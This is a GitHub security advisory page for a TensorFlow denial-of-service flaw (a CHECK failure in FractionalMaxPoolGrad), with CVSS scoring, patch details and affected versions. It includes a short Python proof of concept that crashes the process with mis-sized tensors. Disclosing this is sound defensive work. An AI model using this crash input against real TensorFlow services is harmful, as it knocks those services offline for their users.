Lucene search

K
githubGitHub Advisory DatabaseGHSA-VXV8-R8Q2-63XW
HistorySep 16, 2022 - 10:26 p.m.

TensorFlow vulnerable to `CHECK` fail in `FractionalMaxPoolGrad`

2022-09-1622:26:57
CWE-617
GitHub Advisory Database
github.com
12
tensorflow
vulnerability
fractionalmaxpoolgrad
input validation
denial of service
patch
github
commit
version 2.10.0
cherrypick
version 2.9.1
version 2.8.1
version 2.7.2
security guide
neophytos christou
secure systems labs
brown university
software

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

EPSS

0.001

Percentile

35.2%

Impact

FractionalMaxPoolGrad validates its inputs with CHECK failures instead of with returning errors. If it gets incorrectly sized inputs, the CHECK failure can be used to trigger a denial of service attack:

import tensorflow as tf

overlapping = True
orig_input = tf.constant(.453409232, shape=[1,7,13,1], dtype=tf.float32)
orig_output = tf.constant(.453409232, shape=[1,7,13,1], dtype=tf.float32)
out_backprop = tf.constant(.453409232, shape=[1,7,13,1], dtype=tf.float32)
row_pooling_sequence = tf.constant(0, shape=[5], dtype=tf.int64)
col_pooling_sequence = tf.constant(0, shape=[5], dtype=tf.int64)
tf.raw_ops.FractionalMaxPoolGrad(orig_input=orig_input, orig_output=orig_output, out_backprop=out_backprop, row_pooling_sequence=row_pooling_sequence, col_pooling_sequence=col_pooling_sequence, overlapping=overlapping)

Patches

We have patched the issue in GitHub commit 8741e57d163a079db05a7107a7609af70931def4.

The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by Neophytos Christou, Secure Systems Labs, Brown University.

Affected configurations

Vulners
Node
tensorflowgpuRange<2.9.1
OR
tensorflowgpuRange<2.8.1
OR
tensorflowgpuRange<2.7.2
OR
tensorflowcpuRange<2.9.1
OR
tensorflowcpuRange<2.8.1
OR
tensorflowcpuRange<2.7.2
OR
tensorflowtensorflowRange<2.9.1
OR
tensorflowtensorflowRange<2.8.1
OR
tensorflowtensorflowRange<2.7.2
VendorProductVersionCPE
tensorflowgpu*cpe:2.3:a:tensorflow:gpu:*:*:*:*:*:*:*:*
tensorflowcpu*cpe:2.3:a:tensorflow:cpu:*:*:*:*:*:*:*:*
tensorflowtensorflow*cpe:2.3:a:tensorflow:tensorflow:*:*:*:*:*:*:*:*

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

EPSS

0.001

Percentile

35.2%

Related for GHSA-VXV8-R8Q2-63XW